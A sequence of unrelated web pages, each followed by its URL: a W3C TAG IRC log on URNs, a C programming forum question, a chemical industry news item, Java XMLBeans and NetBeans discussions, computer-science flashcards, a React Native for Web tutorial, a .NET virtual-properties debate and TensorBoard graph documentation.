18:06:40 [Vincent] ack timbl 18:07:00 [raman] HT: clarifies that here metadata is not http header like metadata in response to question: if you have a uri to metadata and uri to object, then how do you keep them in sync? 18:07:13 [DanC] q+ to note that the state-of-the art in metadata is the <link> 18:07:55 [DanC] q+ to note that the state-of-the art in metadata is the <link> element and Link: HTTP header; see widespread practice with RSS feeds associated with web pages, but also navigational links, and in-development work on quality ratings etc. 18:08:09 [ht] The kind of metadata people are looking for in the nRI case is things such as dc:creator etc. 18:08:29 [timbl] Link: 18:09:22 [raman] TimBL: given foo.html then foo.html,meta might give you a lot of extensible metadata 18:09:31 [Vincent] ack danc 18:09:31 [Zakim] DanC, you wanted to note that the state-of-the art in metadata is the <link> and to note that the state-of-the art in metadata is the <link> element and Link: HTTP header; see 18:09:34 [Zakim] ... widespread practice with RSS feeds associated with web pages, but also navigational links, and in-development work on quality ratings etc. 18:10:23 [ht] HST notes that this only works for HTML 18:10:33 [DanC] the Link: header field works 18:11:20 [ht] HST asks for what value of 'works' 18:11:42 [raman] 18:12:24 [timbl] Cool by design (tm) 18:13:34 [DanC] I know somthine bout what trustred resolution _might_ mean, but I was hoping to take advantage of henry's survey work 18:13:34 [raman] DO: reviewing Section 4 18:14:15 [DanC] (huh? I thought the point of URIs is that they're context free; i.e. that The Web is _the_ context.) 18:15:15 [ht] q+ to say that XRIs _are_ meant to be dereferencable 18:16:16 [DanC] (btw, timbl, on permanent domains, note that example.org is permanently allocated by the IETF, i.e. the DNS technical standardization body. I think it's probably efficient to just do that again whenever necessary.) 
18:18:13 [Vincent] ack ht 18:18:13 [Zakim] ht, you wanted to say that XRIs _are_ meant to be dereferencable 18:20:13 [DanC] q+ to note that there are scheme-independent resolution mechanisms (DDS)... 18:22:16 [raman] DO: XRIs use XRI namespace for XRI descriptors 18:22:33 [Vincent] ack danc 18:22:33 [Zakim] DanC, you wanted to note that there are scheme-independent resolution mechanisms (DDS)... 18:22:45 [DanC] q+ to note that there are scheme-independent resolution mechanisms (DDS)... 18:23:01 [ht] DO, HST to consider two examples, one using URNs for namespaces and one using XRIs for documents 18:23:09 [Vincent] ack danc 18:23:09 [Zakim] DanC, you wanted to note that there are scheme-independent resolution mechanisms (DDS)... 18:23:09 [raman] DO: Suggest splitting into two examples A) namespaces a la oasis B) documents that are meant to be location independent 18:23:35 [raman] DanC idea of a uri scheme that cannot be looked up sounds absurd 18:24:47 [raman] TimBL: shall we set up a W3C resolver that does its best to resolve any types of resource? 18:25:05 [DanC] (that was suggested in jest, I'm pretty sure) 18:25:58 [DanC] q+ to ask what's the path from here to XRI proponents 18:26:17 [timbl] can only be used for dereferencing undereferencable URIs 18:27:32 [Vincent] ack danc 18:27:32 [Zakim] DanC, you wanted to ask what's the path from here to XRI proponents 18:28:57 [dorchard] I can take another swag at 2 example.s 18:30:21 [Zakim] -DOrchard 18:30:28 [Zakim] -Norm 18:30:30 [Zakim] -Ht 18:30:33 [DanC] RRSAgent, please draft minutes 18:30:33 [RRSAgent] I have made the request to generate DanC 18:30:36 [Zakim] -TimBL 18:31:16 [DanC] RRSAgent, make logs world-access 18:31:30 [Zakim] -Vincent 18:31:37 [Zakim] -raman 18:31:39 [DanC] raman, can you start with , edit it a bit, and send it to www-tag? 
18:32:46 [DanC] i/last week's/Topic: Convene, take roll, review records and agenda/ 18:32:50 [DanC] RRSAgent, please draft minutes 18:32:50 [RRSAgent] I have made the request to generate DanC 18:33:09 [DanC] Zakim, list attendees 18:33:09 [Zakim] As of this point the attendees have been Ht, DOrchard, Norm, +1.347.661.aaaa, DanC, Vincent, raman, TimBL 18:33:11 [DanC] RRSAgent, please draft minutes 18:33:11 [RRSAgent] I have made the request to generate DanC 18:33:15 [Zakim] -DanC 18:33:16 [Zakim] TAG_Weekly()12:30PM has ended 18:33:17 [Zakim] Attendees were Ht, DOrchard, Norm, +1.347.661.aaaa, DanC, Vincent, raman, TimBL 18:34:11 [DanC] i/AC Meeting At WWW 2006 Edinburgh/Topic: AC Meeting At WWW 2006 Edinburgh/ 18:34:14 [DanC] RRSAgent, please draft minutes 18:34:14 [RRSAgent] I have made the request to generate DanC 18:34:51 [DanC] i/URN discussion/Issue URNsAndRegistries-50/ 18:34:59 [DanC] RRSAgent, please draft minutes 18:35:00 [RRSAgent] I have made the request to generate DanC 18:35:22 [DanC] Regrets: Noah, Ed 18:35:24 [DanC] RRSAgent, please draft minutes 18:35:24 [RRSAgent] I have made the request to generate DanC 18:36:02 [DanC] i/HT: Introduces URN discussion/Issue URNsAndRegistries-50/ 18:36:05 [DanC] RRSAgent, please draft minutes 18:36:05 [RRSAgent] I have made the request to generate DanC 18:36:37 [DanC] i/HT: Introduces URN discussion/Topic: Issue URNsAndRegistries-50/ 18:36:41 [DanC] RRSAgent, please draft minutes 18:36:41 [RRSAgent] I have made the request to generate DanC 18:37:13 [DanC] there. that should do. 19:18:10 [Norm] Norm has joined #tagmem 19:56:06 [Norm] Norm has joined #tagmem 20:03:22 [timbl] timbl has left #tagmem
http://www.w3.org/2006/04/04-tagmem-irc
I have an assignment (so please don't give me code, just an explanation/helpful hints). Basically I divide two integers that are input by the user (e.g. 8 & 13) and store the result in a double. So if I were to do 8/13 I would get 0.615384615384615384615384...

The user also enters another number n. This is the position of the digit they want after the decimal point. With the example above, if the user entered 8 13 5 then they would get the digit 8, as it is the 5th digit after the decimal point.

I tried converting to a string using sprintf and searching through it from the position where the decimal point is, and it works, but it doesn't work for large numbers (i.e. 8 13 60000). So I am trying another way where I try to multiply out the decimal part of the double. However, I am unsure how to go about doing this.

#include <stdio.h>
#include <math.h>

int main(void)
{
    int a;          // First number to divide
    int b;          // Second number to divide
    int n;          // Position after the decimal point to print
    double divAnswer = 0;
    double fractional;
    double integer;

    scanf("%d %d %d", &a, &b, &n);
    divAnswer = (double)a / (double)b;
    fractional = modf(divAnswer, &integer);
    printf("%f", fractional);
    printf("\n%lf", pow(fractional, n));
    return 0;
}

As you can see I am trying to use pow, but I'm not sure how to go about doing it. Any help would be appreciated.
http://www.dreamincode.net/forums/topic/267039-getting-the-nth-integer-from-a-double/
27 April 2010 12:47 [Source: ICIS news]

LONDON (ICIS news)--Celanese plans to close its acetate plant in Spondon, UK.

The consolidation would strengthen its competitive position, reduce fixed costs and align future production capacities with anticipated demand, the chemical company said.

Initially, the proposed closure would lead to a non-cash impairment charge of $72m (€54m) in the first quarter of 2010, Celanese said. If the company proceeded with the closure, Celanese would operate the Spondon plant - which has 460 employees - to late 2011. The company would consult with labour unions over the proposed closure, it said.

Key products manufactured at the Spondon plant include cellulose acetate flake and filter tow. The plant's nameplate capacity is 41,000 tonnes of acetate tow and 60,000 tonnes of acetate flake, according to Celanese.

Under the proposal, Celanese would optimise its global production network, which includes facilities
http://www.icis.com/Articles/2010/04/27/9354282/celanese-to-close-uk-acetate-plant-in-consolidation-strategy.html
reg tutorial

I'm using NetBeans 7.2.1. I followed the steps of the tutorial as given in webservices. Can anyone tell me how to develop and execute it?

Related questions:

- j2ee webservices example in weblogic server with NetBeans or Eclipse: I'm getting a problem at the 17th step; while right-clicking on the source code I'm not getting the option. I'm using NetBeans version 6.9.1. Please help me out. Regards, Harish Kumar
- WebServices in Java: Need a sample example for a web service in Java (web application). Hi, please check Web Services Examples in NetBeans. Thanks.
- Application Using JAX-RPC: Make a NetBeans web project. In it, develop a Web Service application using the JAX-RPC concept. The Web Service should have an operation for interest.
- Webservices: Hi, I have a problem in webservices. I have defined a service which should read the XML file from the client side and read the values... for more information.
- WebServices in Java: Need Web Services examples in Eclipse. Regards, Sathya
- Web Services with NetBeans IDE: Creating webservices in NetBeans. In this example program I will show you how you can make webservices in the NetBeans IDE. NetBeans IDE provides the necessary GUI.
- webservices in websphere server using eclipse: Can WebSphere server be used instead of Tomcat? If so, are any changes to be made? Please elaborate.
http://www.roseindia.net/tutorialhelp/comment/98180
David, I don't know struts so I can't evaluate Eddie's argument. It's frustrating that the limitations of JavaBeans are having such far-reaching effects. It seems everything that has anything to do with data these days has to be a JavaBean. I wonder if JSR 175 is going to change that? I do think I understand the JavaBeans argument, and I think you understand mine. I admit I don't see a solution that would satisfy both sides. So let's leave it at that for now. :) Moving? On a related note, why doesn't XmlObject extends Serializable? I feel like I'm taking a chance passing an XMLBean over RMI. Thanks, Michael On Mon, 19 Jan 2004, David Bau wrote: > Michael, > > Following up further on getIntValue/etc. > > I went back to Eddie O'Neil (a bea colleague), who was one of the people who > ran into the problem with intValue() which lead us to the idea of changing > to getIntValue(). Eddie is using XMLBeans within a struts-based tool. > > Eddie's explanation of the issue is pasted below. (Eddie, I hope it's OK > that I am forwarding your note to the list.) > > I want a design that passes all the philosophical and purity tests, and I > agree that "nonorthogonal properties" are not a great thing. But you'd > probably agree that, for XMLBeans to be useful, we need make sure the design > solves the pragmatic issues above all. (I think we've done a pretty good > job at balancing pragmatism and purity in XMLBeans so far.) Along those > lines, I still don't see any better alternative to the getIntValue()-style > solution to the struts/JSP 2.0 binding problem that Eddie describes below. > Do you see how the design falls out of the struts binding issue? > > David > > [Eddie's note below] > > > ----- Original Message ----- > > From: "Eddie O'Neil" > > To: "David Bau" <david.bau@bea.com> > > Sent: Monday, January 19, 2004 12:37 PM > > Subject: Re: Remember the XmlInt.getIntValue bug? > > > > > > > David-- > > > > > > Hey, good to hear from you. 
> > > > > > You're right about what the problem was -- we (and Struts) bind to > > > JavaBean style properties on objects. This is an issue in Struts in > > > general and will be an issue with binding to XMLBeans using the JSP 2.0 > > > expression language as well -- both use the JavaBean naming conventions > > > for accessing properties on objects. So, something named "intValue()" > > > wouldn't be accessible in a regular Struts application if it was exposed > > > on an object that was wrapped in an action form. In JSP 2.0, for > > > example, if you have an XMLBean and want to access the value of such a > > > simple type with an attribute, you would want to use this expression: > > > > > > {request.poXmlBean.order.total.intValue} > > > > > > on a document that looks like: > > > > > > <order> > > > <total currency="USD">59.95</total> > > > </order> > > > > > > in order to get to 59.95. > > > > > > Feel free to correct my example, but that's the general idea. > > > > > > I can sort of see Michael's point, but it's not a simple matter of > > > purity. The argument that this code modifies two distinct fields in an > > > object doesn't seem to hold to me: > > > > > > xmlInt.setIntValue(1); > > > xmlInt.setLongValue(2); > > > > > > I would expect that this code would do whatever the bean's documentation > > > and (hidden!) underlying implementation says that it does -- it doesn't > > > imply that the implementation of the bean maintains two distinct private > > > fields -- intValue and longValue. Consider: > > > > > > public class Name > > > { > > > private String firstName; > > > private String lastName; > > > > > > String getFirstName() ... > > > String getLastName() ... > > > String getName() ... 
> > > } > > > > > > Michael's stance would mean that "getName()" shouldn't be a JavaBean > > > property because it means that there would need to be a "name" as a > > > private field where in this case name is implemented as: > > > > > > public String getName() > > > { > > > return getLastName() + ", " + getFirstName(); > > > } > > > > > > There is value in being able to do getName() just like there's value in > > > being able to expose a single bit of data stored in an object in many > > > different ways. > > > > > > Tools and binding languages have gravitated toward the JavaBean spec, > > > right or wrong. As a result, it would be a shame to have a great way to > > > compile an XSD and consume an XML document but no way of binding to said > > > document without adding another layer atop it that then exposes the XML > > > to a binding language. > > > > > > Does that make sense? > > > > > > Eddie > > > - --------------------------------------------------------------------- >:
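Eddie's point about binding hinges on the JavaBeans naming convention: tools like Struts and the JSP 2.0 expression language discover properties reflectively through java.beans.Introspector, which only recognizes get/set-prefixed accessors. A small sketch (class names here are invented; this is not XMLBeans code) of why getIntValue() is visible as a property named "intValue" while a bare intValue() method is not:

```java
import java.beans.Introspector;
import java.beans.PropertyDescriptor;

public class BeanNamingDemo {
    /* Stand-in for an XmlInt-like class: one accessor follows the
       JavaBeans convention, the other does not. */
    public static class XmlIntLike {
        private int value;
        public int getIntValue() { return value; }    // discovered as property "intValue"
        public void setIntValue(int v) { value = v; }
        public int intValue() { return value; }       // NOT a JavaBeans property
    }

    /* True if the introspector reports a property with the given name. */
    public static boolean hasProperty(Class<?> c, String name) {
        try {
            for (PropertyDescriptor pd : Introspector.getBeanInfo(c).getPropertyDescriptors()) {
                if (pd.getName().equals(name)) return true;
            }
        } catch (java.beans.IntrospectionException e) {
            // introspection failed; treat as "no such property"
        }
        return false;
    }

    public static void main(String[] args) {
        System.out.println(hasProperty(XmlIntLike.class, "intValue")); // true
    }
}
```

An expression such as request.poXmlBean.order.total.intValue walks this same metadata, which is why it can only resolve against a getIntValue() accessor.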
http://mail-archives.apache.org/mod_mbox/xml-xmlbeans-dev/200401.mbox/%3C20040119231911.H45581@hydra.nfcnet%3E
computer science > Preview

The flashcards below were created by user zeina1074 on FreezingBlue Flashcards.

Q: What is software?
A: A term that refers to computer programs.

Q: What is a program?
A: A set of instructions given to the computer to carry out a task.

Q: What are the two types of software? What do they refer to?
A: Systems software - programs written for the computer (operating systems). Applications software - programs written for users (word processing).

Q: What are the three types of applications software?
A: Tailor-made software, off-the-shelf software, and integrated software packages.

Q: What is the advantage of tailor-made software?
A: Satisfies the company's requirements; easily modified and updated; operates easily; easier to train employees.

Q: What is the disadvantage of tailor-made software?
A: Expensive; takes time; may not immediately function properly; errors may occur; maintenance very dependent on the software developers.

Q: What are the advantages of buying ready software over having it especially written?
A: Available; excellent documentation; well tested; cheaper than having one written; popular and has a wide user base; available support from experienced trainers and users.

Q: What is the disadvantage of buying ready software over having it especially written?
A: Harder to modify; may not meet specific requirements; difficult to learn.

Q: What is an integrated package?
A: A package consisting of a collection of programs that can share the same data.

Q: Name programs that are likely to be included in an integrated package.
A: Word processor program, database program, spreadsheet program, graphics program, communications program.

Q: What are the advantages of integrated software?
A: Requires less storage space than having several specialized packages; cheaper than buying several packages; programs can easily share data; user friendly, as the commands are common in all the programs.

Q: What are the disadvantages of integrated software?
A: Programs are less powerful than the specialized ones; if any program gets corrupted then all might be corrupted.

Q: What is a word processing program?
A: A program that allows the user to create a text document representing a sequence of text characters and formatting codes, edit it, save it, and print it.

Q: Main features of a word processing program (10)?
A: Cut, copy, paste; spell check; format text and pictures; different fonts, text sizes; find and replace; import graphics; headers and footers; can be used as a web design program for basic web page creation; table of contents, numbered captions; exporting as a text or web page file, or as a mail or email merge.

Q: What is meant by the computer term mail merging?
A: Mail merge is the ability to personalize letters with names and addresses from a database.

Q: What is meant by the computer term macro?
A: A macro is a single instruction that replaces a set of instructions and can be done by pressing a key or clicking on an icon. Macros automate repetitive sequences of keystrokes and mouse movements.

Q: What are the benefits of using a template?
A: Using a template avoids repeating work every time a document is created.

Q: What is DTP?
A: A program that produces documents of a quality good enough for publications.

Q: What are the main features of a DTP?
A: Facilitates control of the page layout, i.e. to arrange text and graphics together in an attractive way and to divide pages into columns; allows the user to lay out pictures and text in frames; users can import images from libraries of clip-art and other programs; WYSIWYG; allows exporting.

Q: Which feature makes DTP frame based?
A: It allows the user to lay out pictures and texts in frames, as this is the major advantage of desktop publishing.

Card Set Information
Author: zeina1074
ID: 237654
Filename: computer science
Updated: 2013-09-29 19:09:21
Description: periodic t1 grade
https://www.freezingblue.com/flashcards/print_preview.cgi?cardsetID=237654
React Native for Web is an open source project that enables you to use React Native core components in React web applications. React Native for Web uses React DOM to render JavaScript code that is compatible with React Native in a web browser, making code sharing possible. In this tutorial, we'll set up a React web app using Parcel, build components using React Native core components, and finally, share these components between our mobile and web applications with React Native for Web. Let's get started!

Setting up React Native

First, we'll create a new React Native app. For this demonstration, I'm using npx, but you can also use the react-native-cli package if it is installed globally on your development environment. Open up a new terminal window and execute the following command:

npx react-native init MyApp

MyApp is a placeholder for the name of your React Native project. If you are using iOS Simulator, run yarn run ios. If you're using an emulator for Android, run yarn run android. Once the build process is complete, you'll see the default React Native app with the boilerplate code, which you can modify inside of App.js. As an example, I'll render a simple text message inside of App.js:

import React from 'react';
import { View, StyleSheet, Text } from 'react-native';

const styles = StyleSheet.create({
  screenContainer: { flex: 1 },
  text: {
    fontSize: 20,
    color: 'cornflowerblue',
    marginTop: 50,
    alignSelf: 'center'
  }
});

const App = () => {
  return (
    <View style={styles.screenContainer}>
      <Text style={styles.text}>I'm a React Native component</Text>
    </View>
  );
};

export default App;

The output of the code above will look like the image below:

Setting up Parcel

We'll use Parcel, a bundler that requires zero configuration, to easily set up a new web app in React. Setting up a React app using Parcel follows a similar paradigm to generating an app using Create React App. Create a new directory inside of your React Native project called web/.
Inside, we'll create the following files and add the respective boilerplate code. Create a file called index.html and add the following code:

<html>
  <body>
    <div id="root"></div>
    <script src="./index.js"></script>
  </body>
</html>

Create an App.js file and add the following code to render a text inside of the h2 tag:

import React from 'react';

const WebAppTitle = () => {
  return (
    <div>
      <h2 style={{ color: '#9400d3', fontSize: '32' }}>
        I'm a React app component.
      </h2>
    </div>
  );
};

const App = () => {
  return (
    <>
      <WebAppTitle />
    </>
  );
};

export default App;

Note that the WebAppTitle is a custom web component. Now, we'll create an index.js file and add the following code:

import React from 'react';
import { render } from 'react-dom';
import App from './App';

render(<App />, document.getElementById('root'));

Next, we'll initialize a React app with yarn init, which will open an interactive session for you to create a package.json file and add the required defaults. However, you can skip this session by running the shorthand yarn init --yes. After running yarn init --yes, the package.json file should look like the code below:

{
  "name": "web",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT"
}

Next, install the following dependencies inside of the web directory:

yarn add react react-dom react-native-web
yarn add -D parcel-bundler

Parcel can take any file as an entry point, but an HTML or a JavaScript file is recommended for a web app. Now, we'll add the following scripts to the package.json file:

{
  "scripts": {
    "start": "parcel serve ./index.html",
    "build": "parcel build ./index.html"
  }
}

Bundling our web app with Parcel requires a custom setup.
To configure Parcel to add an alias for the react-native-web package, add the following code to package.json:

{
  "alias": {
    "react-native": "react-native-web"
  }
}

The complete package.json file should look like the following code block:

{
  "name": "web",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "dependencies": {
    "react": "17.0.2",
    "react-dom": "17.0.2",
    "react-native-web": "0.17.1"
  },
  "devDependencies": {
    "parcel-bundler": "1.12.5"
  },
  "scripts": {
    "start": "parcel serve ./index.html",
    "build": "parcel build ./index.html"
  },
  "alias": {
    "react-native": "react-native-web"
  }
}

To start the development server for the web app, run yarn start from the terminal window. Parcel will build the web app and serve it on:

Creating a shared component

Now that we've set up a React Native app and a React web app, let's create a shared component that we can use in both. Inside the root directory of your project, create a new subdirectory called shared. The subdirectory's name indicates that anything inside of it is shared between the web and mobile apps. Inside of shared, create another subdirectory called components. Let's create a file called Header.js, which will contain styles to display a header with a title.
Add the following code to Header.js:

import React from 'react';
import { View, Text, StyleSheet } from 'react-native';

const styles = StyleSheet.create({
  header: { paddingTop: 50, backgroundColor: 'blue' },
  headerText: {
    fontSize: 22,
    color: 'white',
    fontWeight: 'bold',
    paddingHorizontal: 10
  }
});

const Header = () => {
  return (
    <View style={styles.header}>
      <Text style={styles.headerText}>I'm a shared component.</Text>
    </View>
  );
};

export default Header;

Next, add the component to the App.js file in the root directory of your project:

// add this after other import statements
import Header from './shared/components/Header';

// Modify the JSX in the App component
const App = () => {
  return (
    <View style={styles.screenContainer}>
      <Header />
      <Text style={styles.text}>I'm a React Native component</Text>
    </View>
  );
};

You'll have to add a symbolic link to the shared directory for the web app, which is used to reference the contents of a directory at a specific location. Make sure you are in the web directory and run the following command in the terminal window:

ln -s /Users/<your-os-username>/<path-to-the-shared-directory>/shared

The command above will create a reference to the shared directory inside of the web directory. Now, you can import the Header component inside the web/App.js file the same way you imported it in the React Native app:

// web/App.js
import React from 'react';
import Header from './shared/components/Header';

const WebAppTitle = () => {
  return (
    <div>
      <h2 style={{ color: '#9400d3', fontSize: '32' }}>
        I'm a React app component.
      </h2>
    </div>
  );
};

const App = () => {
  return (
    <>
      <Header />
      <WebAppTitle />
    </>
  );
};

export default App;

Run yarn start to restart the development server for the web app. The output of this command will look like the image below:

If you want to see how React Native for Web builds the DOM elements in the web browser, open up Developer Tools and navigate to the Elements tab.
You can also right-click on the web page and select Inspect Element:

On closer look, you'll see that React Native for Web converts React Native styles and components to DOM elements. When styling components, React Native uses JavaScript objects. React Native for Web implements the React Native style API.
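To make the "converts React Native styles to DOM elements" observation concrete, here is a toy sketch (not react-native-web's actual implementation; the function names are invented) of the kind of mapping involved: camelCase style keys become CSS property names, and bare numbers become pixel values:

```javascript
// Toy sketch of mapping a React Native style object to a CSS declaration
// string. react-native-web's real implementation is far more involved
// (atomic class generation, RN-specific properties, and so on).
const toKebab = (name) => name.replace(/[A-Z]/g, (c) => "-" + c.toLowerCase());

function toCss(style) {
  return Object.entries(style)
    .map(([key, value]) => {
      // Plain numbers are treated as pixel values, as in React Native styles.
      const v = typeof value === "number" ? `${value}px` : value;
      return `${toKebab(key)}: ${v}`;
    })
    .join("; ");
}

console.log(toCss({ fontSize: 22, color: "white", fontWeight: "bold" }));
// font-size: 22px; color: white; font-weight: bold
```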
https://blog.logrocket.com/sharing-code-react-native-web/
As part of the WinFX review team, I regularly review APIs for usability issues. One thing that we as a team have been highlighting as a potential issue is the use of virtual properties. Consider the following code snippet:

public class Class1
{
    private string theString;
    public virtual string MyString
    {
        get { return theString; }
        set { theString = value; }
    }
}

public class Class2 : Class1
{
    public override string MyString
    {
        get { return "Ha ha!"; }
        set { base.MyString = value; }
    }
}

Code that accesses the MyString property of an instance of Class1 might either return the actual string or "Ha ha!" depending on the actual runtime type. The design guidelines suggest that properties should not be used if they perform some expensive operation (see Brad's post on a similar issue). Calling a virtual property or method is more expensive than calling non-virtual methods or properties, so that is one reason for not creating virtual properties. Another reason is that we believe the code to access a property doesn't really suggest that the value of MyString depends on the runtime type of the object. Consider the following:

public void DoSomething(Class1 c1)
{
    Console.WriteLine(c1.MyString);
}

In this case, a developer might be surprised if calling DoSomething resulted in "Ha ha!" being output to the console. We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible. Thus virtual properties run the risk of breaking this consistency, since in some cases some properties work just like accessing a field, while in other cases they work more like a virtual method call.

We're not suggesting that there is never a good reason for declaring virtual properties. We're just discouraging the use of virtual properties and encouraging the use of virtual methods instead. However, I'd be interested in your feedback on this issue. Are we being too cautious?

Ouch. That would certainly drive me nuts.
You say "We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible." Why? They're not fields, they're properties. The whole purpose of a property is, in fact, to encapsulate that access away and to allow the actual object to decide how to respond. You're taking away the latter when it is one of the main purposes of a property. Your example is pretty ridiculous too. When you access a property you should never make an assumption about what it is doing. If I access MyString on a class, I know that it can do basically anything it wants and I should treat it that way. IMO, it's decisions like this that always end up giving me classes that are unusable, unextensible and force me to rewrite them all the time. Why would you purposely restrict developers from being able to extend and utilize this code? All you end up doing is hurting those who want that power.

There is a place for virtual properties in API design, but in the majority of cases that we ran into during WinFX reviews, it was actually a design mistake. For example, we have seen lots of APIs where a property was virtual but it still was just accessing the field, and there was no concrete scenario for this property to do anything else. Sure, you can always come up with a corner case scenario, but at what cost:

1. Virtual members are not inlined. That means virtual property access is way more expensive than field access. This is not really acceptable for many system APIs.

2. A virtual property (like any other virtual member) has a higher cost of design, has a negative impact on the ability to version the API, and finally there are potential security implications.

"We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible." What about lazy load scenarios? Those aren't simple member access scenarios. What about abstract properties?
If I want to create an abstract class that requires the deriving class to implement a property, why am I being punished for it? I also agree wholeheartedly with Cyrus's comment.

What you're doing here is limiting the freedom of design for developers, based on purely physical reasons. What you should be doing is go and open a can of whoop ass on the inefficiency of virtual members, namely properties.

I also have to vote in favor of Cyrus's argument. A property is syntactic sugar around a method pair (possibly a single method), and the intent is to shield the details of providing a value from all callers; the implementor is free to change the logic behind it whenever it is necessary. Well, why wouldn't a derived class find it necessary to change the behavior? Perhaps it wants to add a smart caching scheme on top of the base class. Perhaps it wants to do a remote lookup on top of a static local lookup.

I also find the performance argument non-persuasive. Sure, if you sit there in a tight loop calling it 10000 times a second it begins to add up, but I think code that does that is more of a corner case than your example. Most code will call it once in a while, where the extra performance hit of making a virtual method call is unnoticeable. Optimization is good, but it should not get in the way of functionality, especially since this is totally under the control of the base class designer, who can choose to make the property virtual or not.

These are great comments, thanks for sharing them. Clearly some of you feel pretty strongly about this :) We'll absolutely take your feedback into consideration during our reviews. Just to be a little clearer than I was in my original post though, our intention is not to completely prevent API designers from using virtual properties. We just want to make sure that they have very good reasons for using them. As I said, and as you have all reiterated, there are some very good reasons for using virtual properties.
We do not intend to stop API designers from using virtual properties in those cases. One follow-up question I have is - "How do you determine whether or not to make a property virtual?"

Steven - Perhaps I'm misunderstanding the intent of your question, but why is determining whether a property should be extensible any different than for a method, class, or anything else? I'd guess that you'd want to have some meaningful extensibility scenario. There'd have to be no issues for correctness, compatibility, or security. You'd need some amount of resources for programming/test/documentation. But don't you have all of that anyway for virtual methods? I guess I don't see why properties are being treated differently than methods. If you have a situation where get/set makes sense, use a property. Otherwise, use a method. Whether it should be virtual or not doesn't seem to depend on the particular syntax you use to express it.

I cannot understand the logic against virtual properties. They are functions like any other, and need to be overridable, like any other function, on occasion. Virtual does not cause any performance decrease of the magnitude that would cause a problem for a property in a debugger. The "surprise" in the example code would be just as surprising whether the code used a method or a property. Everyone knows a property is a type of function - so what is the big deal? We need the flexibility, and I don't see how you are going to place restrictions, beyond "long execution time", which is a separate issue. You know what this would encourage? GetXX() and SetXX() functions. And people will think this is somehow "better" because they are conforming to a guideline. Don't put out a superfluous guideline! People should have very good reasons for making anything virtual, function or property. Neither is more complex than the other.

Steven, here's a good consideration: I am given a base class with a property.
I can't trust that property not to raise any events, call any methods, etc. just after I set its value from my own class (how could I otherwise set the value?). This is why I would like to override it and do some of my own logic prior to the logic of the base class, or even alter the behaviour altogether.

Thanks again everybody. It seems obvious now, but thanks for making it clear to me. There is no reason for treating virtual properties any differently to virtual methods. If there is a good reason for defining a virtual method, define it. If there isn't, don't.
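The caching scenario raised above is easy to make concrete. The thread is about .NET virtual properties, but the same shape can be sketched in Python, whose properties are overridable by default (class and member names below are invented for illustration):

```python
class DataSource:
    """Base class: the property performs the lookup on every access."""

    def __init__(self):
        self.fetch_count = 0  # how many times the expensive lookup ran

    def _fetch(self):
        # Stand-in for an expensive operation, e.g. a remote lookup.
        self.fetch_count += 1
        return 42

    @property
    def value(self):
        return self._fetch()


class CachingDataSource(DataSource):
    """Derived class overrides the property to add a simple cache --
    the 'smart caching scheme on top of the base class' scenario."""

    def __init__(self):
        super().__init__()
        self._cached = None

    @property
    def value(self):
        if self._cached is None:
            self._cached = self._fetch()  # hit the base lookup only once
        return self._cached
```

Callers never notice the difference: both classes expose the same `value` property, which is exactly the encapsulation argument made above.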
TensorFlow computation graphs are powerful but complicated. The graph visualization can help you understand and debug them. Here's an example of the visualization at work.

Visualization of a TensorFlow graph.

To see your own graph, run TensorBoard pointing it to the log directory of the job, click on the graph tab on the top pane and select the appropriate run using the menu at the upper left corner. For in-depth information on how to run TensorBoard and make sure you are logging all the necessary information, see TensorBoard: Visualizing Learning.

Name scopes define a hierarchy on the nodes in the graph; here is an example that places three ops under the `hidden` name scope:

```python
import tensorflow as tf

with tf.name_scope('hidden') as scope:
  a = tf.constant(5, name='alpha')
  W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='weights')
  b = tf.Variable(tf.zeros([1]), name='biases')
```

This results in the following three op names:

- hidden/alpha
- hidden/weights
- hidden/biases

By default, the visualization will collapse all three into a node labeled hidden. The extra detail isn't lost. You can double-click, or click on the orange + sign in the top right to expand the node, and then you'll see three subnodes for alpha, weights and biases. Here's a real-life example of a more complicated node in its initial and expanded states.

Grouping nodes by name scopes is critical to making a legible graph. If you're building a model, name scopes give you control over the resulting visualization. The better your name scopes, the better your visualization.

The figure above illustrates a second aspect of the visualization. TensorFlow graphs have two kinds of connections: data dependencies and control dependencies. Data dependencies show the flow of tensors between two ops and are shown as solid arrows, while control dependencies use dotted lines. In the expanded view (right side of the figure above) all the connections are data dependencies with the exception of the dotted line connecting CheckNumerics and control_dependency.

There's a second trick to simplifying the layout.
Most TensorFlow graphs have a few nodes with many connections to other nodes. For example, many nodes might have a control dependency on an initialization step. Drawing all edges between the init node and its dependencies would create a very cluttered view.

To reduce clutter, the visualization separates out all high-degree nodes to an auxiliary area on the right and doesn't draw lines to represent their edges. Instead of lines, we draw small node icons to indicate the connections. Separating out the auxiliary nodes typically doesn't remove critical information since these nodes are usually related to bookkeeping functions. See Interaction for how to move nodes between the main graph and the auxiliary area.

One last structural simplification is series collapsing. Sequential motifs--that is, nodes whose names differ by a number at the end and have isomorphic structures--are collapsed into a single stack of nodes, as shown below. For networks with long sequences, this greatly simplifies the view. As with hierarchical nodes, double-clicking expands the series. See Interaction for how to disable/enable series collapsing for a specific set of nodes.

Finally, as one last aid to legibility, the visualization uses special icons for constants and summary nodes. To summarize, here's a table of node symbols:

Interaction

Navigate the graph by panning and zooming. Click and drag to pan, and use a scroll gesture to zoom. Double-click on a node, or click on its + button, to expand a name scope that represents a group of operations. To easily keep track of the current viewpoint when zooming and panning, there is a minimap in the bottom right corner. To close an open node, double-click it again or click its - button. You can also click once to select a node. It will turn a darker color, and details about it and the nodes it connects to will appear in the info card at the upper right corner of the visualization.
TensorBoard provides several ways to change the visual layout of the graph. This doesn't change the graph's computational semantics, but it can bring some clarity to the network's structure. By right clicking on a node or pressing buttons on the bottom of that node's info card, you can make the following changes to its layout:

- Nodes can be moved between the main graph and the auxiliary area.
- A series of nodes can be ungrouped so that the nodes in the series do not appear grouped together. Ungrouped series can likewise be regrouped.

Selection can also be helpful in understanding high-degree nodes. Select any high-degree node, and the corresponding node icons for its other connections will be selected as well. This makes it easy, for example, to see which nodes are being saved--and which aren't. Clicking on a node name in the info card will select it. If necessary, the viewpoint will automatically pan so that the node is visible.

